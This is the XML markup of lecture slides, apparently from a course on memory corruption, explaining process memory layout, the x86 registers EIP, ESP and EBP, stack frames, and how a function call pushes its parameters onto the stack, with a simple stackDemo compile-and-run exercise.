            <a:ext cx="7575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Memory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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5675259" y="1739855"/>
            <a:ext cx="5748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Kernel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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6691993" y="1526499"/>
            <a:ext cx="19539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Operating System binary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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4098977" y="2213565"/>
            <a:ext cx="9405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0xbffffffc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Google Shape;222;g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720986" y="2213565"/>
            <a:ext cx="4833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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6691993" y="2204679"/>
            <a:ext cx="15348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Dynamic Stack Data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g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5766713" y="5129485"/>
            <a:ext cx="3918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Heap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Google Shape;225;g24e5311e72c_0_86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6691993" y="5204419"/>
            <a:ext cx="1451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Dynamic Vars/Data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26" name="Google Shape;226;g24e5311e72c_0_86"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5251703" y="1562100"/>
            <a:ext cx="1421764" cy="5016500"/>
            <a:chOff x="3880103" y="1257300"/>
            <a:chExt cx="1421764" cy="5016500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="227" name="Google Shape;227;g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3880103" y="1257300"/>
              <a:ext cx="1421764" cy="5016500"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="1421239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="5016246"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="678180"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="678180"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="1356360"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="1356360"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="3185160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="3185160"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="3924300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239" y="3924300"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5016246"/>
                  </a:lnTo>
                </a:path>
                <a:path extrusionOk="0" h="5016500" w="1421764">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1421239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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="2438400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="381000" y="342900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="342900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="285750" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="34290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E46C0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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="2438400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="0" y="342900"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="342900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="342900"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:srgbClr val="E46C0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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="3962400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="285750" y="190500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95250" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="190500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="190500" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="19050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g24e5311e72c_0_86"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4419599" y="3962400"/>
              <a:ext cx="381000" cy="533400"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="533400" w="381000">
                  <a:moveTo>
                    <a:pt x="381000" y="190500"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="285750" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285750" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="533400"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95250" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="190500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190500" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="381000" y="190500"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/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232" name="Google Shape;232;g24e5311e72c_0_86"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4079927" y="54868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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1171575"/>
                <a:gridCol w="1421125"/>
                <a:gridCol w="1236975"/>
              </a:tblGrid>
              <a:tr h="24575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4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BSS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3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 Vars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</a:tr>
              <a:tr h="2667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 Data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</a:tr>
              <a:tr h="3251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0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0x08048000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Text Segment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Program binary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</a:tr>
              <a:tr h="2463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0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0x00000000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4e5311e72c_0_134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Registers to know</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Google Shape;239;g24e5311e72c_0_13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Instruction Pointer (EIP)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Points to the next instruction in memory to execute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Is incremented after each instruction is executed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Stack Pointer (ESP)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Points to the last item on the stack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Is decremented on a PUSH or incremented on a POP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Base Pointer (EBP)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Points to a fixed location in the stack frame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Used to reference local function variables and parameters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4e5311e72c_0_140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Stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Google Shape;246;g24e5311e72c_0_14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stack is a data structure (i.e. conceptual entity) in memory used to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Pass variables during a function call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Store control information (e.g. return address)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stack makes use of a contiguous block of memory that follows a LIFO (Last-In, First-Out) order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Two primary operations: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PUSH: adds item to stack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POP: removes last item pushed to the stack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In memory, stack grows downward towards lower memory addresses as items are pushed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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="308565"/>
            <a:ext cx="10515600" cy="889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Code of Conduct</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102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Interrupt me at any time for questions/experiences/anecdotes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Let me know if I move too quickly through topics you haven’t learned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Listen and hopefully learn something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I’m not the one being graded by my content understanding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4e5311e72c_0_146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Stack memory layout</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Google Shape;253;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="1649685"/>
            <a:ext cx="2281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71957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Memory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0xfffffffc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54" name="Google Shape;254;g24e5311e72c_0_146"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5251450" y="1860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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="67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Null Word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4061"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="45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Program Name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3735"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="67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Environment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7933C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="57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Arguments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04A7B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="2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Stack Frame 1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Stack Frame 2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Stack Frame N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</a:tr>
              <a:tr h="73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sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Google Shape;255;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="2518365"/>
            <a:ext cx="9405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0xbffffffc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Google Shape;256;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="2451059"/>
            <a:ext cx="27084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1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Static starting address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Name of program (e.g. /bin/ping)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g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="3187659"/>
            <a:ext cx="2792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Environment variables (e.g. PATH)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g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="3865839"/>
            <a:ext cx="2456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75">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="5080" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="104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Program arguments (e.g. argc, argv[])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g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="4442419"/>
            <a:ext cx="28758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Stack frame for each function call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g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6800850" y="5130759"/>
            <a:ext cx="1870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&lt;- ESP (Stack pointer)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Google Shape;261;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4025825" y="5858465"/>
            <a:ext cx="9405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0x00000000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62" name="Google Shape;262;g24e5311e72c_0_146"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3060700" y="41211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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1428750"/>
              </a:tblGrid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Function Args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Ret. Address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Prev. EBP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</a:tr>
              <a:tr h="2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Local Variables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</a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="263" name="Google Shape;263;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3307640" y="3926799"/>
            <a:ext cx="9480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Stack Frame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Google Shape;264;g24e5311e72c_0_146"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092256" y="4091899"/>
            <a:ext cx="8643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0xbfff????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5" name="Google Shape;265;g24e5311e72c_0_146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="4191000"/>
            <a:ext cx="548639" cy="878839"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="878839" w="548639">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="72925" y="1633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138454" y="6241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193973" y="13390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236867" y="22643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="45718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="393575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284118" y="405728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354666" y="425902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410185" y="433051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475714" y="437659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="548640" y="439293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="475714" y="440926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="410185" y="445534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="354666" y="452683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311772" y="461936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="485010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274320" y="832868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264521" y="845021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236867" y="855942"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193973" y="865195"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="138454" y="872344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72925" y="876952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="878586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4e5311e72c_0_165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Exercise: memcor/stackDemo</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;272;g24e5311e72c_0_16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Objective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Understand flow of control in a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Procedure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Compile and run program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$ make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$ ./stackDemo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Examine code and think about control flow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code stackDemo.c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Questions to think about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In what order are instructions executed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Where are the instructions stored?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How does the CPU know which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>instructions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> to execute?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4e5311e72c_0_171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Calling a function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="279" name="Google Shape;279;g24e5311e72c_0_17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When calling a function we create a stack frame by “pushing” information onto the stack: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Data/Parameters passed to the function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Instruction Pointer (EIP), used to return to our previous location on function exit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Base pointer (EBP) used to reference local function variables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Function local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function call loads the memory address of the function into the EIP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On function exit the saved return address is loaded into the EIP and the stack frame is “popped” off the stack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4e5311e72c_0_177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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;g24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6338570" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,3);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7" name="Google Shape;287;g24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6338570" y="2439333"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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void myFunction (int num1, int num2, int num3)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39419" marR="1604645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char buffer1[8]; char buffer2[12];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88" name="Google Shape;288;g24e5311e72c_0_177"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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78460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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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0xbffff360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0xbffff35C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35575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0xbffff358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0xbffff354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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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0x00000004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57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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;g24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2248371"/>
            <a:ext cx="12807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31115" lvl="0" marL="12700" marR="508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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer) Start of stack frame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24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5208553"/>
            <a:ext cx="11418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Bottom of Memory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24e5311e72c_0_177"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_190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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="299" name="Google Shape;299;g24e5311e72c_0_190"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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0xbffff35C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35575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0xbffff358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0xbffff354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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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0x00000004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57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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;g24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2509262"/>
            <a:ext cx="12498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Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5208553"/>
            <a:ext cx="11418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Bottom of Memory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24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5828567"/>
            <a:ext cx="52998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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push parameters (from right to left)</a:t>
            </a:r>
            <a:endParaRPr sz="25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04" name="Google Shape;304;g24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,2,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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g24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2457621"/>
            <a:ext cx="3866400" cy="1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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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void myFunction (int num1, int num2, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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 num3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39419" marR="1604645" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="114285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char buffer1[8]; char buffer2[12];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1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Google Shape;306;g24e5311e72c_0_190"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_204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Stack: Calling a Function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="313" name="Google Shape;313;g24e5311e72c_0_204"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1898650" y="16700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{2699E51E-27AD-45A0-8260-30540317AD18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1085850"/>
                <a:gridCol w="1428750"/>
              </a:tblGrid>
              <a:tr h="177800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="248920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Address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Contents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65100" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="11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0xfffffffc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0xbffff364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00000003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0xbffff360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00000002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0xbffff35C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35575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0xbffff358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0xbffff354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0xbffff350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0xbffff34c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0xbffff348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0xbffff344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0xbffff340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0x00000004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57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0x00000000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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="Google Shape;314;g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="1807493"/>
            <a:ext cx="913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Top of Memory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g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="2403663"/>
            <a:ext cx="12498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6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Start of stack frame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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:latin typeface="Noto Sans Symbols"/>
                <a:ea typeface="Noto Sans Symbols"/>
                <a:cs typeface="Noto Sans Symbols"/>
                <a:sym typeface="Noto Sans Symbols"/>
              </a:rPr>
              <a:t>&lt; </a:t>
            </a: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ESP (Stack Pointer)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g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4438650" y="5208553"/>
            <a:ext cx="11418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Bottom of Memory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24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2669539" y="5828567"/>
            <a:ext cx="52998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entury Schoolbook"/>
                <a:ea typeface="Century Schoolbook"/>
                <a:cs typeface="Century Schoolbook"/>
                <a:sym typeface="Century Schoolbook"/>
              </a:rPr>
              <a:t>Push parameters (from right to left)</a:t>
            </a:r>
            <a:endParaRPr sz="25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18" name="Google Shape;318;g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="1466005"/>
            <a:ext cx="24798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0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void main()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39419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myFunction (1,</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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,3);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Google Shape;319;g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6384290" y="2500293"/>
            <a:ext cx="38664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925">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="12700" marR="508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myFunction (int num1,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 num2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int num3)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spcBef>
                <a:spcPts val="215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39419" marR="1605280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 buffer1[8]; char buffer2[12];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spcBef>
                <a:spcPts val="254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Google Shape;320;g24e5311e72c_0_204"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2593339" y="1298133"/>
            <a:ext cx="9735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Memory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4e5311e72c_0_218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Stack: Calling a Function</a:t>
            </a:r>
